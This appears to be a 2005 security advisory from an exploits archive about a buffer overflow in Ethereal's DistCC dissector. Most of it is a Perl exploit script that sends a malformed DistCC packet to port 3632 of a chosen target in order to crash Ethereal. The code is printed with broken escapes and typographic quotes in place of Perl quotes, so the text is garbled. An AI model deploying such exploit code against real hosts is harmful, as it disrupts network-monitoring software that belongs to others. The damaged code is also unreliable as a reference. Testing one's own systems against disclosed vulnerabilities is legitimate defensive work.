‘Ethereal DistCC Buffer Overflow (Exploit)’

Summary

‘As we reported in our previous article: Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal’s DistCC dissector allows attackers to cause Ethereal to crash by overflowing an internal buffer used by Ethereal when it tries to handle DistCC related packets. The following exploit code can be used to test your system for the mentioned vulnerability.’

Credit:

‘The information has been provided by beSTORM.’


Details

Vulnerable Systems:
 * Ethereal version 0.10.10 and prior

Immune Systems:
 * Ethereal version 0.10.11 or newer

Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved – Copyright ™

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;

if (!$target)
{
 usage();

 print ‘No target has been supplied, reverting to 192.168.1.52.n’;
 $target = ‘192.168.1.52’;
}

print ‘Will attack $target.n’;
my $target_port = 3632;

my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()n{n return(0);n}n
END

print ‘Sending: [$packet]n’;

my $remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $target, PeerPort => ‘3632’);

unless ($remote) { die ‘cannot connect to distcc daemon on $target’ }

print $remote $packet;

print ‘Done.n’;

sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print (‘#’x50);
 print ‘n’;
 print ‘# $0 [hostname]n’;
 print ‘# hostnamet-tThe host the packet will be sent to.n’;
 print ‘n’;
}’

Categories: Exploits